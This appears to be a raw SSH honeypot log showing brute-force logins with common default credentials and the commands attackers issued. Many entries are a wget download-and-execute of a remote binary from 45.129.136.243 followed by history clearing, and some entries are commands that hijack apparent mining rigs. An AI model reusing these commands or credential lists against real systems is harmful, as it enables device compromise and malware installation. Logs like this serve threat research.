2021-11-23 11:47:05,408 - root - INFO - New connection from: 136.144.41.3
2021-11-23 11:47:05,429 - paramiko.transport - ERROR - Exception: Error reading SSH protocol banner
2021-11-23 11:47:05,433 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 11:47:05,433 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2211, in _check_banner
2021-11-23 11:47:05,433 - paramiko.transport - ERROR -     buf = self.packetizer.readline(timeout)
2021-11-23 11:47:05,434 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 380, in readline
2021-11-23 11:47:05,434 - paramiko.transport - ERROR -     buf += self._read_timeout(timeout)
2021-11-23 11:47:05,434 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 609, in _read_timeout
2021-11-23 11:47:05,434 - paramiko.transport - ERROR -     raise EOFError()
2021-11-23 11:47:05,434 - paramiko.transport - ERROR - EOFError
2021-11-23 11:47:05,434 - paramiko.transport - ERROR - 
2021-11-23 11:47:05,434 - paramiko.transport - ERROR - During handling of the above exception, another exception occurred:
2021-11-23 11:47:05,434 - paramiko.transport - ERROR - 
2021-11-23 11:47:05,434 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 11:47:05,434 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2039, in run
2021-11-23 11:47:05,434 - paramiko.transport - ERROR -     self._check_banner()
2021-11-23 11:47:05,434 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2215, in _check_banner
2021-11-23 11:47:05,434 - paramiko.transport - ERROR -     raise SSHException(
2021-11-23 11:47:05,434 - paramiko.transport - ERROR - paramiko.ssh_exception.SSHException: Error reading SSH protocol banner
2021-11-23 11:47:05,434 - paramiko.transport - ERROR - 
2021-11-23 11:47:43,946 - root - INFO - New connection from: 136.144.41.3
2021-11-23 11:47:43,949 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 11:47:44,104 - root - INFO - New client credentials from 136.144.41.3: username: user, password: 123
2021-11-23 11:47:44,104 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 11:47:44,153 - root - INFO - New command from 136.144.41.3: b'sudo hive-passwd salutlume123f5123; sudo pkill Xorg; sudo pkill x11vnc'
2021-11-23 11:48:22,861 - root - INFO - New connection from: 136.144.41.3
2021-11-23 11:48:22,864 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 11:48:23,034 - root - INFO - New client credentials from 136.144.41.3: username: user, password: 1234
2021-11-23 11:48:23,035 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 11:48:23,078 - root - INFO - New command from 136.144.41.3: b'sudo hive-passwd salutlume123f5123; sudo pkill Xorg; sudo pkill x11vnc'
2021-11-23 11:49:00,567 - root - INFO - New connection from: 136.144.41.3
2021-11-23 11:49:00,567 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 11:49:00,703 - root - INFO - New client credentials from 136.144.41.3: username: user, password: 123456
2021-11-23 11:49:00,703 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 11:49:00,748 - root - INFO - New command from 136.144.41.3: b'sudo hive-passwd salutlume123f5123; sudo pkill Xorg; sudo pkill x11vnc'
2021-11-23 11:49:37,608 - root - INFO - New connection from: 136.144.41.3
2021-11-23 11:49:37,612 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 11:49:37,733 - root - INFO - New client credentials from 136.144.41.3: username: user, password: 12345678
2021-11-23 11:49:37,733 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 11:49:37,783 - root - INFO - New command from 136.144.41.3: b'sudo hive-passwd salutlume123f5123; sudo pkill Xorg; sudo pkill x11vnc'
2021-11-23 11:50:13,606 - root - INFO - New connection from: 136.144.41.3
2021-11-23 11:50:13,609 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 11:50:13,725 - root - INFO - New client credentials from 136.144.41.3: username: user, password: cloud
2021-11-23 11:50:13,725 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 11:50:13,776 - root - INFO - New command from 136.144.41.3: b'sudo hive-passwd salutlume123f5123; sudo pkill Xorg; sudo pkill x11vnc'
2021-11-23 11:50:49,007 - root - INFO - New connection from: 136.144.41.3
2021-11-23 11:50:49,039 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 11:50:49,191 - root - INFO - New client credentials from 136.144.41.3: username: user, password: amin123
2021-11-23 11:50:49,191 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 11:50:49,259 - root - INFO - New command from 136.144.41.3: b'sudo hive-passwd salutlume123f5123; sudo pkill Xorg; sudo pkill x11vnc'
2021-11-23 11:51:24,339 - root - INFO - New connection from: 136.144.41.3
2021-11-23 11:51:24,340 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 11:51:24,476 - root - INFO - New client credentials from 136.144.41.3: username: user, password: 888888
2021-11-23 11:51:24,476 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 11:51:24,553 - root - INFO - New command from 136.144.41.3: b'sudo hive-passwd salutlume123f5123; sudo pkill Xorg; sudo pkill x11vnc'
2021-11-23 11:55:27,305 - root - INFO - New connection from: 164.90.206.79
2021-11-23 11:55:27,323 - paramiko.transport - ERROR - Exception: Error reading SSH protocol banner
2021-11-23 11:55:27,323 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 11:55:27,323 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2211, in _check_banner
2021-11-23 11:55:27,323 - paramiko.transport - ERROR -     buf = self.packetizer.readline(timeout)
2021-11-23 11:55:27,323 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 380, in readline
2021-11-23 11:55:27,324 - paramiko.transport - ERROR -     buf += self._read_timeout(timeout)
2021-11-23 11:55:27,324 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 609, in _read_timeout
2021-11-23 11:55:27,324 - paramiko.transport - ERROR -     raise EOFError()
2021-11-23 11:55:27,324 - paramiko.transport - ERROR - EOFError
2021-11-23 11:55:27,324 - paramiko.transport - ERROR - 
2021-11-23 11:55:27,324 - paramiko.transport - ERROR - During handling of the above exception, another exception occurred:
2021-11-23 11:55:27,324 - paramiko.transport - ERROR - 
2021-11-23 11:55:27,324 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 11:55:27,324 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2039, in run
2021-11-23 11:55:27,324 - paramiko.transport - ERROR -     self._check_banner()
2021-11-23 11:55:27,324 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2215, in _check_banner
2021-11-23 11:55:27,324 - paramiko.transport - ERROR -     raise SSHException(
2021-11-23 11:55:27,324 - paramiko.transport - ERROR - paramiko.ssh_exception.SSHException: Error reading SSH protocol banner
2021-11-23 11:55:27,324 - paramiko.transport - ERROR - 
2021-11-23 12:00:39,067 - root - INFO - New connection from: 193.29.14.205
2021-11-23 12:00:39,122 - paramiko.transport - ERROR - Exception: Error reading SSH protocol banner
2021-11-23 12:00:39,122 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 12:00:39,122 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2211, in _check_banner
2021-11-23 12:00:39,122 - paramiko.transport - ERROR -     buf = self.packetizer.readline(timeout)
2021-11-23 12:00:39,122 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 380, in readline
2021-11-23 12:00:39,123 - paramiko.transport - ERROR -     buf += self._read_timeout(timeout)
2021-11-23 12:00:39,123 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 609, in _read_timeout
2021-11-23 12:00:39,123 - paramiko.transport - ERROR -     raise EOFError()
2021-11-23 12:00:39,123 - paramiko.transport - ERROR - EOFError
2021-11-23 12:00:39,123 - paramiko.transport - ERROR - 
2021-11-23 12:00:39,123 - paramiko.transport - ERROR - During handling of the above exception, another exception occurred:
2021-11-23 12:00:39,123 - paramiko.transport - ERROR - 
2021-11-23 12:00:39,123 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 12:00:39,123 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2039, in run
2021-11-23 12:00:39,123 - paramiko.transport - ERROR -     self._check_banner()
2021-11-23 12:00:39,123 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2215, in _check_banner
2021-11-23 12:00:39,123 - paramiko.transport - ERROR -     raise SSHException(
2021-11-23 12:00:39,123 - paramiko.transport - ERROR - paramiko.ssh_exception.SSHException: Error reading SSH protocol banner
2021-11-23 12:00:39,123 - paramiko.transport - ERROR - 
2021-11-23 12:01:00,698 - root - INFO - New connection from: 193.29.14.205
2021-11-23 12:01:00,698 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 12:01:00,999 - root - INFO - New client credentials from 193.29.14.205: username: root, password: root
2021-11-23 12:01:00,999 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 12:01:01,110 - root - INFO - New URL detected from 193.29.14.205: http://45.129.136.243/cometome
2021-11-23 12:01:01,111 - root - INFO - New IP-based URL detected from 193.29.14.205: 45.129.136.243/cometome;
2021-11-23 12:01:01,111 - root - INFO - New command from 193.29.14.205: b'cat /etc/issue/; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.129.136.243/cometome; cometome; chmod 777 cometome; ./cometome; history -c'
2021-11-23 12:01:14,475 - root - INFO - New connection from: 193.29.14.205
2021-11-23 12:01:14,476 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 12:01:14,781 - root - INFO - New client credentials from 193.29.14.205: username: admin, password: admin
2021-11-23 12:01:14,781 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 12:01:14,894 - root - INFO - New URL detected from 193.29.14.205: http://45.129.136.243/cometome
2021-11-23 12:01:14,895 - root - INFO - New IP-based URL detected from 193.29.14.205: 45.129.136.243/cometome;
2021-11-23 12:01:14,895 - root - INFO - New command from 193.29.14.205: b'cat /etc/issue/; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.129.136.243/cometome; cometome; chmod 777 cometome; ./cometome; history -c'
2021-11-23 12:01:28,366 - root - INFO - New connection from: 193.29.14.205
2021-11-23 12:01:28,366 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 12:01:28,657 - root - INFO - New client credentials from 193.29.14.205: username: root, password: password
2021-11-23 12:01:28,657 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 12:01:28,765 - root - INFO - New URL detected from 193.29.14.205: http://45.129.136.243/cometome
2021-11-23 12:01:28,765 - root - INFO - New IP-based URL detected from 193.29.14.205: 45.129.136.243/cometome;
2021-11-23 12:01:28,765 - root - INFO - New command from 193.29.14.205: b'cat /etc/issue/; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.129.136.243/cometome; cometome; chmod 777 cometome; ./cometome; history -c'
2021-11-23 12:01:42,972 - root - INFO - New connection from: 193.29.14.205
2021-11-23 12:01:42,973 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 12:01:43,260 - root - INFO - New client credentials from 193.29.14.205: username: admin, password: 1234
2021-11-23 12:01:43,260 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 12:01:43,367 - root - INFO - New URL detected from 193.29.14.205: http://45.129.136.243/cometome
2021-11-23 12:01:43,367 - root - INFO - New IP-based URL detected from 193.29.14.205: 45.129.136.243/cometome;
2021-11-23 12:01:43,367 - root - INFO - New command from 193.29.14.205: b'cat /etc/issue/; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.129.136.243/cometome; cometome; chmod 777 cometome; ./cometome; history -c'
2021-11-23 12:01:57,950 - root - INFO - New connection from: 193.29.14.205
2021-11-23 12:01:57,951 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 12:01:58,240 - root - INFO - New client credentials from 193.29.14.205: username: user, password: user
2021-11-23 12:01:58,240 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 12:01:58,348 - root - INFO - New URL detected from 193.29.14.205: http://45.129.136.243/cometome
2021-11-23 12:01:58,348 - root - INFO - New IP-based URL detected from 193.29.14.205: 45.129.136.243/cometome;
2021-11-23 12:01:58,348 - root - INFO - New command from 193.29.14.205: b'cat /etc/issue/; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.129.136.243/cometome; cometome; chmod 777 cometome; ./cometome; history -c'
2021-11-23 12:02:13,630 - root - INFO - New connection from: 193.29.14.205
2021-11-23 12:02:13,631 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 12:02:13,927 - root - INFO - New client credentials from 193.29.14.205: username: user, password: passwd
2021-11-23 12:02:13,927 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 12:02:14,037 - root - INFO - New URL detected from 193.29.14.205: http://45.129.136.243/cometome
2021-11-23 12:02:14,037 - root - INFO - New IP-based URL detected from 193.29.14.205: 45.129.136.243/cometome;
2021-11-23 12:02:14,037 - root - INFO - New command from 193.29.14.205: b'cat /etc/issue/; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.129.136.243/cometome; cometome; chmod 777 cometome; ./cometome; history -c'
2021-11-23 12:02:29,331 - root - INFO - New connection from: 193.29.14.205
2021-11-23 12:02:29,331 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 12:02:29,623 - root - INFO - New client credentials from 193.29.14.205: username: admin, password: 12345
2021-11-23 12:02:29,623 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 12:02:29,731 - root - INFO - New URL detected from 193.29.14.205: http://45.129.136.243/cometome
2021-11-23 12:02:29,731 - root - INFO - New IP-based URL detected from 193.29.14.205: 45.129.136.243/cometome;
2021-11-23 12:02:29,731 - root - INFO - New command from 193.29.14.205: b'cat /etc/issue/; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.129.136.243/cometome; cometome; chmod 777 cometome; ./cometome; history -c'
2021-11-23 12:02:45,446 - root - INFO - New connection from: 193.29.14.205
2021-11-23 12:02:45,447 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 12:02:45,741 - root - INFO - New client credentials from 193.29.14.205: username: pi, password: raspberry
2021-11-23 12:02:45,741 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 12:02:45,850 - root - INFO - New URL detected from 193.29.14.205: http://45.129.136.243/cometome
2021-11-23 12:02:45,850 - root - INFO - New IP-based URL detected from 193.29.14.205: 45.129.136.243/cometome;
2021-11-23 12:02:45,850 - root - INFO - New command from 193.29.14.205: b'cat /etc/issue/; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.129.136.243/cometome; cometome; chmod 777 cometome; ./cometome; history -c'
2021-11-23 12:03:01,638 - root - INFO - New connection from: 193.29.14.205
2021-11-23 12:03:01,639 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 12:03:01,937 - root - INFO - New client credentials from 193.29.14.205: username: raspberry, password: pi
2021-11-23 12:03:01,937 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 12:03:02,048 - root - INFO - New URL detected from 193.29.14.205: http://45.129.136.243/cometome
2021-11-23 12:03:02,048 - root - INFO - New IP-based URL detected from 193.29.14.205: 45.129.136.243/cometome;
2021-11-23 12:03:02,048 - root - INFO - New command from 193.29.14.205: b'cat /etc/issue/; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.129.136.243/cometome; cometome; chmod 777 cometome; ./cometome; history -c'
2021-11-23 12:03:18,104 - root - INFO - New connection from: 193.29.14.205
2021-11-23 12:03:18,105 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 12:03:18,401 - root - INFO - New client credentials from 193.29.14.205: username: ubnt, password: ubnt
2021-11-23 12:03:18,401 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 12:03:18,510 - root - INFO - New URL detected from 193.29.14.205: http://45.129.136.243/cometome
2021-11-23 12:03:18,510 - root - INFO - New IP-based URL detected from 193.29.14.205: 45.129.136.243/cometome;
2021-11-23 12:03:18,510 - root - INFO - New command from 193.29.14.205: b'cat /etc/issue/; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.129.136.243/cometome; cometome; chmod 777 cometome; ./cometome; history -c'
2021-11-23 12:03:34,688 - root - INFO - New connection from: 193.29.14.205
2021-11-23 12:03:34,689 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 12:03:34,985 - root - INFO - New client credentials from 193.29.14.205: username: usuario, password: usuario
2021-11-23 12:03:34,985 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 12:03:35,096 - root - INFO - New URL detected from 193.29.14.205: http://45.129.136.243/cometome
2021-11-23 12:03:35,096 - root - INFO - New IP-based URL detected from 193.29.14.205: 45.129.136.243/cometome;
2021-11-23 12:03:35,096 - root - INFO - New command from 193.29.14.205: b'cat /etc/issue/; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.129.136.243/cometome; cometome; chmod 777 cometome; ./cometome; history -c'
2021-11-23 12:03:51,554 - root - INFO - New connection from: 193.29.14.205
2021-11-23 12:03:51,554 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 12:03:51,854 - root - INFO - New client credentials from 193.29.14.205: username: support, password: support
2021-11-23 12:03:51,854 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 12:03:51,965 - root - INFO - New URL detected from 193.29.14.205: http://45.129.136.243/cometome
2021-11-23 12:03:51,966 - root - INFO - New IP-based URL detected from 193.29.14.205: 45.129.136.243/cometome;
2021-11-23 12:03:51,966 - root - INFO - New command from 193.29.14.205: b'cat /etc/issue/; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.129.136.243/cometome; cometome; chmod 777 cometome; ./cometome; history -c'
2021-11-23 12:04:08,392 - root - INFO - New connection from: 193.29.14.205
2021-11-23 12:04:08,397 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 12:04:08,695 - root - INFO - New client credentials from 193.29.14.205: username: 1234, password: 1234
2021-11-23 12:04:08,695 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 12:04:08,806 - root - INFO - New URL detected from 193.29.14.205: http://45.129.136.243/cometome
2021-11-23 12:04:08,806 - root - INFO - New IP-based URL detected from 193.29.14.205: 45.129.136.243/cometome;
2021-11-23 12:04:08,806 - root - INFO - New command from 193.29.14.205: b'cat /etc/issue/; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.129.136.243/cometome; cometome; chmod 777 cometome; ./cometome; history -c'
2021-11-23 12:04:25,143 - root - INFO - New connection from: 193.29.14.205
2021-11-23 12:04:25,144 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 12:04:25,439 - root - INFO - New client credentials from 193.29.14.205: username: root, password: passwd
2021-11-23 12:04:25,439 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 12:04:25,548 - root - INFO - New URL detected from 193.29.14.205: http://45.129.136.243/cometome
2021-11-23 12:04:25,548 - root - INFO - New IP-based URL detected from 193.29.14.205: 45.129.136.243/cometome;
2021-11-23 12:04:25,548 - root - INFO - New command from 193.29.14.205: b'cat /etc/issue/; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.129.136.243/cometome; cometome; chmod 777 cometome; ./cometome; history -c'
2021-11-23 12:04:41,872 - root - INFO - New connection from: 193.29.14.205
2021-11-23 12:04:41,872 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 12:04:42,168 - root - INFO - New client credentials from 193.29.14.205: username: root, password: toor
2021-11-23 12:04:42,168 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 12:04:42,279 - root - INFO - New URL detected from 193.29.14.205: http://45.129.136.243/cometome
2021-11-23 12:04:42,279 - root - INFO - New IP-based URL detected from 193.29.14.205: 45.129.136.243/cometome;
2021-11-23 12:04:42,279 - root - INFO - New command from 193.29.14.205: b'cat /etc/issue/; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.129.136.243/cometome; cometome; chmod 777 cometome; ./cometome; history -c'
2021-11-23 12:04:58,510 - root - INFO - New connection from: 193.29.14.205
2021-11-23 12:04:58,511 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 12:04:58,801 - root - INFO - New client credentials from 193.29.14.205: username: telnet, password: telnet
2021-11-23 12:04:58,801 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 12:04:58,908 - root - INFO - New URL detected from 193.29.14.205: http://45.129.136.243/cometome
2021-11-23 12:04:58,908 - root - INFO - New IP-based URL detected from 193.29.14.205: 45.129.136.243/cometome;
2021-11-23 12:04:58,908 - root - INFO - New command from 193.29.14.205: b'cat /etc/issue/; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.129.136.243/cometome; cometome; chmod 777 cometome; ./cometome; history -c'
2021-11-23 12:05:15,504 - root - INFO - New connection from: 193.29.14.205
2021-11-23 12:05:15,505 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 12:05:15,795 - root - INFO - New client credentials from 193.29.14.205: username: root, password: administrator
2021-11-23 12:05:15,795 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 12:05:15,903 - root - INFO - New URL detected from 193.29.14.205: http://45.129.136.243/cometome
2021-11-23 12:05:15,903 - root - INFO - New IP-based URL detected from 193.29.14.205: 45.129.136.243/cometome;
2021-11-23 12:05:15,903 - root - INFO - New command from 193.29.14.205: b'cat /etc/issue/; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.129.136.243/cometome; cometome; chmod 777 cometome; ./cometome; history -c'
2021-11-23 12:05:32,404 - root - INFO - New connection from: 193.29.14.205
2021-11-23 12:05:32,405 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 12:05:32,696 - root - INFO - New client credentials from 193.29.14.205: username: root, password: 1234567890
2021-11-23 12:05:32,696 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 12:05:32,803 - root - INFO - New URL detected from 193.29.14.205: http://45.129.136.243/cometome
2021-11-23 12:05:32,803 - root - INFO - New IP-based URL detected from 193.29.14.205: 45.129.136.243/cometome;
2021-11-23 12:05:32,803 - root - INFO - New command from 193.29.14.205: b'cat /etc/issue/; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.129.136.243/cometome; cometome; chmod 777 cometome; ./cometome; history -c'
2021-11-23 12:05:49,848 - root - INFO - New connection from: 193.29.14.205
2021-11-23 12:05:49,848 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 12:05:50,142 - root - INFO - New client credentials from 193.29.14.205: username: root, password: raspberry
2021-11-23 12:05:50,142 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 12:05:50,251 - root - INFO - New URL detected from 193.29.14.205: http://45.129.136.243/cometome
2021-11-23 12:05:50,251 - root - INFO - New IP-based URL detected from 193.29.14.205: 45.129.136.243/cometome;
2021-11-23 12:05:50,251 - root - INFO - New command from 193.29.14.205: b'cat /etc/issue/; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.129.136.243/cometome; cometome; chmod 777 cometome; ./cometome; history -c'
2021-11-23 12:06:06,923 - root - INFO - New connection from: 193.29.14.205
2021-11-23 12:06:06,923 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 12:06:07,217 - root - INFO - New client credentials from 193.29.14.205: username: root, password: pass
2021-11-23 12:06:07,217 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 12:06:07,326 - root - INFO - New URL detected from 193.29.14.205: http://45.129.136.243/cometome
2021-11-23 12:06:07,326 - root - INFO - New IP-based URL detected from 193.29.14.205: 45.129.136.243/cometome;
2021-11-23 12:06:07,326 - root - INFO - New command from 193.29.14.205: b'cat /etc/issue/; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.129.136.243/cometome; cometome; chmod 777 cometome; ./cometome; history -c'
2021-11-23 12:06:24,304 - root - INFO - New connection from: 193.29.14.205
2021-11-23 12:06:24,305 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 12:06:24,585 - root - INFO - New client credentials from 193.29.14.205: username: root, password: pass12345
2021-11-23 12:06:24,585 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 12:06:24,689 - root - INFO - New URL detected from 193.29.14.205: http://45.129.136.243/cometome
2021-11-23 12:06:24,689 - root - INFO - New IP-based URL detected from 193.29.14.205: 45.129.136.243/cometome;
2021-11-23 12:06:24,689 - root - INFO - New command from 193.29.14.205: b'cat /etc/issue/; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.129.136.243/cometome; cometome; chmod 777 cometome; ./cometome; history -c'
2021-11-23 12:06:41,410 - root - INFO - New connection from: 193.29.14.205
2021-11-23 12:06:41,411 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 12:06:41,709 - root - INFO - New client credentials from 193.29.14.205: username: admin, password: password
2021-11-23 12:06:41,709 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 12:06:41,820 - root - INFO - New URL detected from 193.29.14.205: http://45.129.136.243/cometome
2021-11-23 12:06:41,820 - root - INFO - New IP-based URL detected from 193.29.14.205: 45.129.136.243/cometome;
2021-11-23 12:06:41,820 - root - INFO - New command from 193.29.14.205: b'cat /etc/issue/; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.129.136.243/cometome; cometome; chmod 777 cometome; ./cometome; history -c'
2021-11-23 12:47:18,944 - root - INFO - New connection from: 205.185.119.40
2021-11-23 12:47:19,089 - paramiko.transport - ERROR - Exception: Error reading SSH protocol banner
2021-11-23 12:47:19,090 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 12:47:19,090 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2211, in _check_banner
2021-11-23 12:47:19,090 - paramiko.transport - ERROR -     buf = self.packetizer.readline(timeout)
2021-11-23 12:47:19,090 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 380, in readline
2021-11-23 12:47:19,090 - paramiko.transport - ERROR -     buf += self._read_timeout(timeout)
2021-11-23 12:47:19,090 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 609, in _read_timeout
2021-11-23 12:47:19,090 - paramiko.transport - ERROR -     raise EOFError()
2021-11-23 12:47:19,090 - paramiko.transport - ERROR - EOFError
2021-11-23 12:47:19,090 - paramiko.transport - ERROR - 
2021-11-23 12:47:19,090 - paramiko.transport - ERROR - During handling of the above exception, another exception occurred:
2021-11-23 12:47:19,090 - paramiko.transport - ERROR - 
2021-11-23 12:47:19,090 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 12:47:19,090 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2039, in run
2021-11-23 12:47:19,090 - paramiko.transport - ERROR -     self._check_banner()
2021-11-23 12:47:19,091 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2215, in _check_banner
2021-11-23 12:47:19,091 - paramiko.transport - ERROR -     raise SSHException(
2021-11-23 12:47:19,091 - paramiko.transport - ERROR - paramiko.ssh_exception.SSHException: Error reading SSH protocol banner
2021-11-23 12:47:19,091 - paramiko.transport - ERROR - 
2021-11-23 12:47:44,085 - root - INFO - New connection from: 205.185.119.40
2021-11-23 12:47:44,087 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 12:47:45,304 - root - INFO - New client credentials from 205.185.119.40: username: user, password: 1
2021-11-23 12:47:45,304 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 12:47:45,797 - root - INFO - New command from 205.185.119.40: b'sudo hive-passwd `hostname`; echo `hostname`; pkill Xorg; pkill x11vnc; pkill Hello; systemctl stop shellinabox; history -c'
2021-11-23 13:08:30,330 - root - INFO - New connection from: 23.183.81.227
2021-11-23 13:08:30,414 - paramiko.transport - ERROR - Exception: Error reading SSH protocol banner
2021-11-23 13:08:30,414 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 13:08:30,414 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2211, in _check_banner
2021-11-23 13:08:30,414 - paramiko.transport - ERROR -     buf = self.packetizer.readline(timeout)
2021-11-23 13:08:30,414 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 380, in readline
2021-11-23 13:08:30,414 - paramiko.transport - ERROR -     buf += self._read_timeout(timeout)
